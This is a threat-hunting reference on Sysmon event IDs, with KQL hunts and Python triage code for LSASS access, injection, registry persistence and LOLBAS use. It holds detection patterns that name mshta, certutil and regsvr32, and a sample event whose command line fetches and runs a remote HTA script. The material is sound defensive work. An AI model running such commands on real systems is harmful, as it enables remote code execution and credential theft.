Sysmon Event IDs
One-liner: A reference of key Sysmon event IDs essential for threat hunting, detection engineering, and security monitoring.
🎯 What Is It?
Sysmon (System Monitor) is a Sysinternals Windows system service and device driver that logs detailed system activity to the Windows Event Log (channel Microsoft-Windows-Sysmon/Operational). Each event type has its own Event ID and a fixed set of EventData fields that capture one kind of behavior. Understanding these Event IDs is critical for:
- Building detection rules
- Threat Hunting investigations
- Incident response and forensics
- MITRE ATT&CK technique detection
📊 Key Event IDs for Threat Hunting
Process & Execution Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 1 | Process Creation | New process with full command line, parent process, user, and image hashes | Hunt malicious execution, LOLBAS abuse |
| 2 | Process Changed File Creation Time | A process modified a file's creation timestamp (timestomping) | Defense evasion detection |
| 5 | Process Terminated | Process exit; pair with ID 1 via ProcessGuid | Track malware execution duration |
| 6 | Driver Loaded | Kernel driver load with hash and signature status | Rootkit/driver-based attacks |
Network Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 3 | Network Connection | TCP/UDP connection with owning process, source/destination address and port; not logged unless enabled in the config | C2 detection, data exfiltration |
| 22 | DNS Query | DNS lookup with the queried name and returned results (Sysmon 10+) | DNS tunneling, C2 beaconing |
File & Registry Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 11 | File Created | File creation or overwrite, with the creating process | Malware drops, persistence |
| 12 | Registry Object Added/Deleted | Registry key or value created or deleted | Persistence via Run keys |
| 13 | Registry Value Set | Registry value written; the Details field carries the new data | Hunt autoruns, config changes |
| 14 | Registry Rename | Registry key or value renamed | Evasion technique detection |
| 15 | FileCreateStreamHash | Alternate Data Stream created, with the stream's hash | Hidden payload detection |
| 23 | File Deleted | File deletion, with a copy archived to the Sysmon archive directory | Evidence destruction tracking |
Injection & Evasion Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 7 | Image Loaded | DLL/image load with hash and signature status (very noisy) | DLL hijacking, injection prep |
| 8 | CreateRemoteThread | Thread created in another process | Process injection detection |
| 10 | ProcessAccess | One process opened a handle to another; GrantedAccess holds the requested rights | Credential dumping (LSASS access) |
| 25 | Process Tampering | Process image changed in memory (hollowing, herpaderping) | Process hollowing detection |
Other Important Events
| Event ID | Name | Description | Use Case |
|---|---|---|---|
| 16 | Sysmon Config Change | Sysmon configuration state changed; cannot be filtered out by the config | Tampering detection |
| 17 | Pipe Created | Named pipe created | C2 communication, lateral movement |
| 18 | Pipe Connected | Named pipe connected to | SMB lateral movement |
| 19-21 | WMI Events | 19 WmiEventFilter, 20 WmiEventConsumer, 21 WmiEventConsumerToFilter binding | WMI-based persistence/execution |
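Sysmon writes each of the events above as Windows event XML, with the fields listed in the tables under EventData. The following Python, added here as an illustration and not taken from the Sysmon documentation or the THM material, parses that XML and triages Event ID 10 against lsass.exe by decoding GrantedAccess into PROCESS_* rights. The sample events, the trusted-reader allowlist and the CallTrace value are constructed for the example.

```python
"""Parse raw Sysmon event XML (the layout exported from the
Microsoft-Windows-Sysmon/Operational channel) and triage Event ID 10
(ProcessAccess) for credential-dumping style access to LSASS.
Added example: every event below is constructed, not real telemetry."""
import xml.etree.ElementTree as ET

# Windows event schema namespace present on every <Event> element
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Subset of PROCESS_* access rights from winnt.h, keyed by bit value
ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Hypothetical allowlist of images that legitimately read LSASS on this host;
# build yours from a baseline of your own environment, not from this example.
TRUSTED_LSASS_READERS = {r"c:\program files\windows defender\msmpeng.exe"}


def parse_sysmon_event(xml_text):
    """Flatten one <Event> into {'EventID': int, <Data Name>: text, ...}."""
    root = ET.fromstring(xml_text)
    event = {"EventID": int(root.find("e:System/e:EventID", NS).text)}
    for data in root.findall("e:EventData/e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event


def decode_access(mask):
    """Expand a GrantedAccess mask such as 0x1010 into PROCESS_* right names."""
    return [name for bit, name in ACCESS_RIGHTS.items() if mask & bit]


def triage_lsass_access(event):
    """Return a finding for suspicious Event 10 access to lsass.exe, else None."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "")
    if source.lower() in TRUSTED_LSASS_READERS:
        return None
    mask = int(event.get("GrantedAccess", "0x0"), 16)
    rights = decode_access(mask)
    # Credential dumpers must read LSASS memory, so PROCESS_VM_READ (0x10)
    # is the bit that matters; query-only handles (0x1400) are routine noise.
    if "PROCESS_VM_READ" not in rights:
        return None
    return {"source": source, "granted": f"0x{mask:X}", "rights": rights,
            "call_trace": event.get("CallTrace", "")}


def triage_all(xml_events):
    """Parse and triage a batch of raw events, returning only the findings."""
    findings = (triage_lsass_access(parse_sysmon_event(x)) for x in xml_events)
    return [f for f in findings if f is not None]


def _event10(source, target, access):
    """Constructed Event 10 in the real log layout (sample data, not captured)."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>10</EventID>
  <Channel>Microsoft-Windows-Sysmon/Operational</Channel></System>
  <EventData>
    <Data Name="SourceImage">{source}</Data>
    <Data Name="TargetImage">{target}</Data>
    <Data Name="GrantedAccess">{access}</Data>
    <Data Name="CallTrace">C:\\Windows\\SYSTEM32\\ntdll.dll+9d2e4</Data>
  </EventData>
</Event>"""


LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    # Mimikatz-style handle: VM_READ | QUERY_LIMITED_INFORMATION from a temp dir
    _event10(r"C:\Users\bob\AppData\Local\Temp\dump.exe", LSASS, "0x1010"),
    # Full access, but from the allowlisted AV engine
    _event10(r"C:\Program Files\Windows Defender\MsMpEng.exe", LSASS, "0x1FFFFF"),
    # Query-only handle from svchost: no memory read, so not flagged
    _event10(r"C:\Windows\System32\svchost.exe", LSASS, "0x1400"),
    # Same suspicious image, but the target is not LSASS
    _event10(r"C:\Users\bob\AppData\Local\Temp\dump.exe", r"C:\Windows\explorer.exe", "0x1FFFFF"),
]

if __name__ == "__main__":
    for finding in triage_all(SAMPLE_EVENTS):
        print(finding)
```

Only the first sample produces a finding: it targets lsass.exe, is not allowlisted, and its mask includes PROCESS_VM_READ. Tuning on the access mask rather than on every Event 10 against LSASS is what keeps this hunt usable at scale, since query-only handles from system processes are constant background.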
🕵️ Threat Hunting Scenarios (from THM)
Hunt Process Injection (Event ID 8)
host.name: WKSTN-* AND winlog.event_id: 8
Columns: process.executable, winlog.event_data.SourceUser, winlog.event_data.TargetImage
Hunt Malicious File Downloads (Event ID 11)
host.name: WKSTN-* AND process.name: chrome.exe AND winlog.event_id: 11
Columns: winlog.computer_name, winlog.event_data.User, file.path
Hunt Registry Persistence (Event ID 13)
host.name: WKSTN-* AND winlog.event_id: 13
AND registry.path: (*CurrentVersion\\Run* OR *CurrentVersion\\Explorer\\Shell*)
Columns: process.name, registry.path, winlog.event_data.Details
Hunt LOLBAS Execution (Event ID 1 + 3)
host.name: WKSTN-* AND winlog.event_id: (1 OR 3)
AND process.name: (mshta.exe OR certutil.exe OR regsvr32.exe)
Hunt Network Connections from Scripts (Event ID 3)
host.name: WKSTN-* AND winlog.event_id: 3
AND process.name: (*python* OR *php* OR powershell.exe)
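The five hunts above are written as Kibana KQL against Winlogbeat/ECS field names. As an added example (not part of the THM material or the page's own queries), the same predicates in Python over events shaped like Winlogbeat documents, using the page's field names and filter lists; the sample events are constructed, and the extra display columns for the last two hunts are this example's choice.

```python
"""Run the page's five Kibana hunts as Python predicates over Winlogbeat/ECS-
shaped Sysmon documents, using the same field names the queries reference.
Added example: the sample events are constructed, not exported telemetry."""
from fnmatch import fnmatchcase


def field(event, path, default=""):
    """Resolve a dotted ECS name ('winlog.event_data.TargetImage') in a nested dict."""
    cur = event
    for key in path.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return default
        cur = cur[key]
    return cur


def matches(value, *patterns):
    """KQL-style term match: exact name or * glob, case-insensitive."""
    text = str(value).lower()
    return any(fnmatchcase(text, p.lower()) for p in patterns)


def event_id(event):
    # Winlogbeat may ship winlog.event_id as a string; normalise to int.
    return int(field(event, "winlog.event_id", 0))


def on_workstation(event):
    return matches(field(event, "host.name"), "WKSTN-*")


def hunt_process_injection(event):       # winlog.event_id: 8
    return on_workstation(event) and event_id(event) == 8


def hunt_browser_file_drop(event):       # event 11 created by chrome.exe
    return (on_workstation(event) and event_id(event) == 11
            and matches(field(event, "process.name"), "chrome.exe"))


def hunt_registry_persistence(event):    # event 13 under Run / Explorer\Shell keys
    return (on_workstation(event) and event_id(event) == 13
            and matches(field(event, "registry.path"),
                        "*CurrentVersion\\Run*", "*CurrentVersion\\Explorer\\Shell*"))


def hunt_lolbas(event):                  # event 1 or 3 from a LOLBAS binary
    return (on_workstation(event) and event_id(event) in (1, 3)
            and matches(field(event, "process.name"),
                        "mshta.exe", "certutil.exe", "regsvr32.exe"))


def hunt_script_network(event):          # event 3 from a script interpreter
    return (on_workstation(event) and event_id(event) == 3
            and matches(field(event, "process.name"), "*python*", "*php*", "powershell.exe"))


# hunt name -> (predicate, display columns)
HUNTS = {
    "process_injection": (hunt_process_injection,
        ("process.executable", "winlog.event_data.SourceUser", "winlog.event_data.TargetImage")),
    "browser_file_drop": (hunt_browser_file_drop,
        ("winlog.computer_name", "winlog.event_data.User", "file.path")),
    "registry_persistence": (hunt_registry_persistence,
        ("process.name", "registry.path", "winlog.event_data.Details")),
    "lolbas_execution": (hunt_lolbas, ("host.name", "process.name", "process.command_line")),
    "script_network": (hunt_script_network, ("host.name", "process.name", "destination.ip")),
}


def run_hunts(events):
    """Return {hunt_name: [row of display columns for each matching event]}."""
    return {name: [{col: field(e, col) for col in cols} for e in events if pred(e)]
            for name, (pred, cols) in HUNTS.items()}


def make_event(host, eid, fields):
    """Build a nested ECS-style document from dotted names (constructed sample)."""
    doc = {"host": {"name": host}, "winlog": {"event_id": eid, "computer_name": host}}
    for path, value in fields.items():
        cur = doc
        *parents, leaf = path.split(".")
        for key in parents:
            cur = cur.setdefault(key, {})
        cur[leaf] = value
    return doc


SAMPLE_EVENTS = [
    make_event("WKSTN-01", 8, {"process.executable": r"C:\Users\bob\AppData\Local\Temp\inj.exe",
                               "winlog.event_data.SourceUser": r"WKSTN-01\bob",
                               "winlog.event_data.TargetImage": r"C:\Windows\explorer.exe"}),
    make_event("SRV-DC01", 8, {"process.executable": r"C:\Windows\System32\csrss.exe"}),  # server: out of scope
    make_event("WKSTN-02", 11, {"process.name": "chrome.exe",
                                "file.path": r"C:\Users\alice\Downloads\invoice.iso"}),
    make_event("WKSTN-02", 13, {"process.name": "reg.exe",
                                "registry.path": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
                                "winlog.event_data.Details": r"C:\Users\alice\AppData\Roaming\updater.exe"}),
    make_event("WKSTN-01", 13, {"process.name": "msiexec.exe",  # benign key: not matched
                                "registry.path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\App"}),
    make_event("WKSTN-03", 1, {"process.name": "mshta.exe",
                               "process.command_line": "mshta.exe http://203.0.113.10/a.hta"}),
    make_event("WKSTN-03", 3, {"process.name": "powershell.exe", "destination.ip": "203.0.113.10"}),
]

if __name__ == "__main__":
    for hunt, rows in run_hunts(SAMPLE_EVENTS).items():
        print(hunt, rows)
```

Each hunt fires exactly once on the sample set; the domain controller's Event 8 is dropped by the host.name filter and the Uninstall key write by the registry.path globs, which mirrors how the KQL behaves in Kibana. Expressing the hunts as plain predicates is also the easiest way to unit-test them against known-good and known-bad events before shipping them as SIEM rules.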
📋 Recommended Sysmon Configuration
For threat hunting, ensure your Sysmon config captures at minimum:
| Event ID | Priority | Reason |
|---|---|---|
| 1 | Critical | All process creation with command lines |
| 3 | High | Network connections for C2 detection |
| 7 | Medium | DLL loads (very noisy; include only unsigned images or unusual load paths) |
| 8 | Critical | CreateRemoteThread for injection |
| 10 | High | Process access for credential theft (filter on TargetImage lsass.exe and the GrantedAccess mask) |
| 11 | High | File creation for malware drops |
| 13 | High | Registry mods for persistence |
| 22 | High | DNS queries for tunneling detection |
🎤 Interview Angles
Common Questions
- "Which Sysmon events are most important for threat detection?"
- "How would you detect process injection using Sysmon?"
- "What's the difference between Event ID 12 and 13?"
- "How do you handle Sysmon event volume in a large environment?"
Quick Answer
"For threat hunting, I prioritize Event ID 1 (process creation), 3 (network connections), 8 (CreateRemoteThread for injection), 10 (process access for LSASS dumping), 11 (file creation), and 13 (registry changes for persistence). These cover the core MITRE ATT&CK tactics: Execution, Command and Control, Defense Evasion, Credential Access, and Persistence."
"Event ID 12 records a registry key or value being created or deleted; Event ID 13 records a value being written, with the new data in the Details field. Run-key persistence therefore usually surfaces as a 13, and cleanup of the key afterwards as a 12."
✅ Best Practices
- Use a well-tuned Sysmon config (e.g., SwiftOnSecurity's sysmon-config or Olaf Hartong's sysmon-modular) rather than the defaults, which do not log network connections
- Forward Sysmon logs to SIEM for centralized analysis
- Create baseline of normal events before hunting
- Combine with PowerShell Script Block Logging for full visibility
- Monitor Event ID 16 for Sysmon config tampering and Event ID 4 (Sysmon service state changed) for the service being stopped; neither can be filtered out by the config
🔗 Related Concepts
- Sysmon
- Windows Event Logs
- Threat Hunting
- Process Injection
- MITRE ATT&CK
- Living off the Land (LOLBAS)
- Elastic
📚 References
- Microsoft Sysmon Documentation: https://docs.microsoft.com/sysinternals/sysmon
- SwiftOnSecurity Sysmon Config: https://github.com/SwiftOnSecurity/sysmon-config
- SANS Sysmon Cheat Sheet
- TrustedSec Sysmon Community Guide